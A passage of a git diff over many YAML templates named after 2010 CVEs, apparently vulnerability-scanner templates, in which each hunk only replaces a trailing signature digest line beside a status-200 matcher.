490a004630440220548521f736459dae087d6a2bd94e3ae9773f5b831cff83356187c4188522b8f802201265d0b432dbacee031aaaf9bcbc72699612e5e25f881527cde284df0d35481c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 8ae74ebca4..0910a8204d 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100876fb86c79af734429fbc9bdfb62d32fd323913fbc5ae9c33893faab219ae3c602206ca924646a6b9f04d4dec02f0bb07862085ebdff0d46abfad8b2240c0393e6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c29bf12509751c6d4971b808635de57b7692d9e53df31d4b294649bb5ce456db022100bd518edc4ef976a87843b5cf5c4eec01353017a668000897cd0020a9fd09f094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 6c460827dd..e951d57d27 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d0c1adbee91ba0f423fad303a3c182b56ad5c138a7221caf9130517861e6117c022100d55fa6ed5331dababcf68714d5fb316596f6b8d380047b626d68b4b4a36c742e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009af853087a4818f3b40be3d023435dd789ec1badcb73949d41adfdfb8ffbe233022100d3bf069aa45a4e07a8ab6390cdc65d98ef6675f01ea2c12cba76b36042b91fc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 9005d916c1..9aa687c0b7 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b92a27cffd675f1c89a3dc3e259e02b18bbe0ff2e7cd9787bb5d854df856f03b022100add5340c3c01697019aea1c76881d865dd47f08d25693a0c2093852745f5a4ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd10b899ed886c29db67e5b79cf219545f680f39b12d5d8afbcc2bb0f48ad20702206c5a8174bb915705ddb88eee879ee3c44d6bb6924b51d8a2452e908474fe6e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 1e5f524d3d..e9a084f961 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7b209de18902a760625d6ee1b1726d8c8230c7245ed6860a5acdc3e63ffe2a7022100e8e2b13dc396a3eb51196b25ee07a28e692c0bdd8e4037bc8f267d85c4dc2f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d0345bc171d83b4201aa878f8a267915ce9379a6fcc88c609476ecc452ecc4f02200bfc25daa3c0bb029d6639d3a22eba998fce947d379499b47a17083afbb0c816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index ecbfb10510..34e59780d7 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220059fc9b5d99d0d9636137e465805abe09edfea773c219ee0dd6d87a2605f9a300220287a6169b7fba68798660e2b0e0188fc71bc828617d12932f2e6190c33ebd60a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d337364bec15e62a5e51894f00482a853c0b83de12621326180d670fe85be2550220100fd4c82fbacc8ea7654009879641cc7e3cbbd695d9c489fe313644a3fdf818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index c489f17df3..74233ba758 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207184322c628890c7de0c4e3b9e9a2a38517f6dddb9757aa44683b05c5518d787022071d178ca46976c0d4eae94a264e03b9a248fffca2f1a4483533b61c79e3ee4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043fd12edb4a3a2a5476d0728b0371efefd549591b361970554bafd57766a5a7d0220319e614d046afdbc29519ddcf8c1b48b88a98655409e986e93b30e09366c7a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index ffeefe2b9a..29f5fdfb93 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c70ac3505d2888d409e88401fcdadae2ced10f0197d0e70e6eef6505e9089340221008150d3e8600d1b74bd1f117801abf55b73c717d316d6df6e5857d4483b1cfa2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index cee8a26272..2412d6d079 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202608ff17d05c1eddc7f2dfefd801dfdbf7d9f4e7aa9b3bcb2ae33ab4583127eb022026a61d3cc90098725c4dfe38516b199263a3e3d90d86c8392fd18e94c6fbb1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c63f224a283f97a55ae4941e39f19ae06e9761cf123943f1b4d394ecef11ea9022100d2900835201e1b12398af58927fbaada9d98b609932bfc9f70d7c6263a16a705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 93129c1f6a..2ee9dcd3fa 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bf0aee412d06368c98fca3c5f5acd7d378deaff7f94313cfe17e4997e7134b1402206400a81abbcd5aa5fc32a71ce46b84d0bd52e7c4e8312f1641d3e6f24f3882b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005af39fb89c8d8753e1bcb87009d6d4d1de2cb594ed2c7fd92db1d9971237aeb022100bec720c951ec411c59b60dbf4113ab4a22c3e29ca90e8e253aab3e7e0dec4e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index fbb9cee6c0..343bae62dc 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a501efbc261ba3dca04808035ecb890c50a87a301ad73de87b783b42fcaae80e022100a9bc2efda2309dbbed6cbb5642dc1e2045421eac3a0c65afa45a6ddc4e340e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce9830af0a126d6aae7b0cbe9b7598011f30691e6f9066386c81c9fb4bf3c1bc022014f94fe6e238d285a780454bb05c33859277fe46440a3a38ce33dd5a9d376175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 064108079e..bfff5dcbf2 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f28d01f57161a02bf0727760cedef9d94c2eae06175f5cff2722ac42891705502210092b555b66eb7a1abf30dfb9b43ddea7d298e3a94a34fc2f2610b3a9a70e6a70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058bbc0b32a0debf917a4482c1d2aaf6dd8d22f0d12d301863ab6f832fa4b7dc6022100cd4e71908a61f85fe54f802d0d68887c7e90055e562e68608ec4b42cb4de3736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index bd05c2ec44..23cafb560b 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202121cd01dd9130a4df3708fab70ce958f9025d26f741ad780f6eb001a13a760d022100933a7c9a67524bcf829bf0d10c41a766a162bbf285e02864468e207fd4f8e97d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8a369f60457a7ad48ee08f06532f8ea4030fe25b2fe4d735fdfd1442f512d9c022100de537a9f67ca16a85f4b2b73a6f4acb836f318fa80b2cecbf785fd5d92651037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 29f3f43fea..c18732ba69 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099e361029dd2b13b7ce1617abb9d5d5e62a93a547c85b1a88a3289fdade3228002201212ff5df8c40c36dfeff295664a50612b5c7720ce00132d29e7072faa3e709a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0a41e3ef2fff8d4281685f568b953c58721b3ae23726e41f4687da5de910e64022100bb7d92ae5fafc295c7b580db91dfab2e82e1d68946435e325a1e1d8bc6887978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index cc88bd94db..a9ab14284a 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1a85f61617d33d7033a9ae61f1741c631eafa7ae6298ed48d6b3e4f75742bcc022025df56677ce67bdd9ab8ec6f25a490e6737bd23050d9745724b670d3f651d23c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db80873c4e826e771eec3d90cc217edd2052bb04999b81c92e730edfdd70ccee02204a0f81a67a7a8065fe6aa1db38bd12b03921b8796c10a8adbe1e151d35643bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 67d7722a82..a3f6f5ad1f 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a41e186494cff0411569ac94cbed846bfd365971d32ff593c0b4cb9fbeb863402207e8dc37b800a70db2c107e7273a86040ce60d4832674571a6f0bf26fcb7f5aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 14a7369c16..a6e5e7208e 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100916d493f8d0166ab7dde5f484b0963ae103abbb8b0f926bac0a2f24aa5a81bd2022001fa8f2cdd6f76c94df0c42ee8db8d6f26da14bbe8953b56c90b9ede41b566e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 1d2bd6b0f5..06afaa24fb 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aaafaba703a85bd81d5f4acc65a093ce81264516c39efd67fb447f6fd6615073022100d7cad168b5f7cefde4740e542d8892f0015d33c775be4c7f4c956257c24e5c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index d3da9c97e6..82d4d0479b 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022034ed107f98bf9a6630f8ddc3a96730172b160cbefef1dd37bb45e26211ce49af022100fa323aff65f2736bfca57c089274687dbca74d664b5aaac0bf127e54c97cdd8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 1721c83977..9866062708 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220612c9d0f0757477a811a5256adb95a722644ff613a9ff8272ad3d70e320e3ea002205c2c73a09137ae43f48b4b4e4c2959239a443384bd2c605fe0540579328208f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054c49fc7d9cd0665b02bdd1416c1510b1752a4f06b6591edf9975587dbd9f87102202a6ac32dc8f19d3831f4ecb72f8145c38a2992e9219593c3b2d5ad99f3f36663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 818c7afdc3..ba9f57adb0 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb79e5ca805fea8fe60a8da7b67221fd11a7e17e825c46873e7414f67df55734022100c4ed3318d684aee6e12b1736c3160f47830e36f18a8c310d6ba8c9ea0d04a7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index e90da3b533..58f4abbb84 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205b52ce550a244bf2c23391aef03cc4e4b3ea431959f64161ddfdf80b982508c0022044f5e66c0cea9f34691150499ab2d348912dc1f9b32c3e14a7c5b8f999f0de8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 7e5cabac9d..9a911b9473 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b01c9856322d9bcfe1a21b8f43426e1656023b0aecc41d99780205da5af939502204b3bb673dcd395404abe7f7a2feec655e65fae50ced9ed026fe20b9827380b28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index cc4fdf3336..7563f0af9a 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bca0ac89fede9525b184d272b14b12506f54c4ebd6fb83ac3a6dfaff63d4ecf7022032c4a4e48ac35b30f0774371dc241e37289a5f3ba7bdad0086090d3850470915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8786ea9146eb623bc2e6b94ff1ddfd987d8af333475bb9273ff1e2bd35ff26a02200fb7110b7f5395f71dee1c009e3dc058d633f521052cc4f3484c6f358684bbf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 6941286ffe..e7be83623e 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202c4558150efab349eabefec39495b645b37acbbbe42d7b26ba7f817e569307ec02207c44d889326329ce6e1be791306049f2de7bf349471b3757e672f2b2b6b2074a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d077e7a8b82e5dacdc61932a6699b6f16fe3599d2fe585624ab67c61dbf65ad9022100815c9cafcb46abe0609189924d5076416102570d3f3a4801a745b86b82a64336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 3d80e1674f..709a568761 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e7de74fcdfdf3856aaf4945497594c157d578d8267335518e8c5b0cf86547b2022100f74801bf918033fde188ff4544e44821be6b31b23f8f07cce3e52036c09a16cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index b4379c8b45..72fac83966 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064d39306d66a4f88f1000df66fe994f283e1a246d261da97dc69e3227bf29833022100a917de4597a0440165700aace81e8e134c2d15aa9beb4a44bab1520ed4cff1e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efdd3798466d640e256d5a756ee7b624ed3eb6e4e1eff2d6307ab2bac89b607c022057069d8f4c691f3e6f4948c0d8355e3f992e8ff17c66ed10eec31c3abe925c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index a870eef23a..0e46a5d11d 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9f99e858aa23608056b09957c35cf8f31015b7d2b8a9a927b882eb9de6c2c0102205a4dcf52e0fd30a3d040e9607bcae2343f61ad39cff98b0921f575338e3406aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094404f0f2f56a48166becec496073702fc13c233b56b332a59b23f75f2e9e664022100a030d88a7de00e472b914f484390aaf26834775c6ffcaf7329883a6386f70366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 81e99ac1c1..80f826ac10 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202aac6578b7598abd4ff276b4a14f13c88adbe2a4695a685bd3b40297252e752c022100b93346f7ab31092a260ac60e142d59022c4c96d6eee80456f12a2a19e2d907dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5b682510b8bee3ed2a7bcec2db3688588e5cd495dbb210642e123af4e422c1022030a7073ddc270bea7a017af5c0334ff17b94e2c32f1bba9cd2cf581e1e3a997c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index b6c6fb2b07..bf0c409599 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d9d2424eebd59ae90addf133b079776c971c3f90e3003ab97f0607ffdc1e14f02200a26babe13ed145ed0c7f748a6763eb79d8fac3c2f12b802410b597a4f5c0f69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 7b24fbf971..1aa77d90cf 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d10c2132dd931093e957840606a524afe85c4c114e8ab885e035e613033f0b90221009bb75a19aa038cbe307f4d89c6d9384275bd06ff2e501873c2c27aff10a22789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 2f9dd52a72..5b0064eee5 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022030465efe0b2be3a19dbcdd9c3535f15de229d6eb626051d72132f356adc1a048022070dbaf0b5f607a91309959b61bff123a71af8a5216db69667e75f96198d59696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 5daa0dfc9b..48197e9b5b 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c679546d4a20ef615b92060d7d043f59acd2739e1bc3057a11e945356b872e5022100acbc8140b0b0eb42024aec3c90c73c12fac2d728729207cb1ba72211f847cfc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f4fb71b63c3bd17e13086007edddf0deeb7717685fefb075a4fd05cc9745216022078dacb5768e7279c9408bceebe738d0d2ec037568513077d54f5acd5353b1920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index e57c8896b6..d8e2bdf0ef 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022022e4bf201377052999272439185f1c53b9d5f3cb8c3037c8a5ab631ef715ba08022100c6797f6885262b50899430bbb5bc93e1e343d715623a4c16e2821cf480969b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da8e5ec0db4b337d02f25af0f867f89b847da04714f68f22e6be3b3be3f0abd40220060b76f49c5ea887ceb19ee81f19d9fb8153e344b22d53416492d8c1e1a99058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index c57db7260b..57d5f2b9da 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220403bb3b7063c46bf47b1b0c29d4f01d026e53d0f5fb69beaf2cab001c199bd050220357ed0cdcea11955153e0fb7edbfa574a571775910cf2819359f19d3f1b204fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb5ec476643b95c64caa86cc061308c75ceace843e58db8bae08413f2160846602201dc89742c9b1a55df817ec772150de1c14e53494415f3a1e177701a94db23fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 45131b5fbe..8a56651ed7 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022025e7107167e51fc81e497cb71e8a05d48a367cd8add95c9a1cb9da8532e5ebc502202e0c8fbff7030285dddeb47a8efeb008f0925c69d2d4d38bb75618baa5c271ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205817b1f254b7fb87cd0f69682290db1a8bb6187ebdfdf121e6ead47dc2d135c0022100d9b2ce8c2c9cda540a9e6893d6568d4c20c7dda27fa0dca249cb62083226c9eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 7110040c59..3b14b099fc 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207daa9695156e723aa7bf30c4dd476f8fb306aca71e103ae76965da4c08ec3189022040ea74d5cd1861c066229cc7f2e7d695f85b6a86e777b9a0372bfc0a460a92ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbfdf3607b6347ba7d7420f35506f8f2cff5bcb10afcb6d67570bbc874f0ea98022100e12d0a6af4937bca526ed8962cf3d20fcdfde6f0e14e2153b2f73251c35b4125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index c64969b653..e37ce9a665 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e8e86e589d935441f253cf062452d93f64689ce7801530271268c15f57d6ec902210088f2f067871fd73cda565907c4784f19f21c347de32679ed339c080bacd6adde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 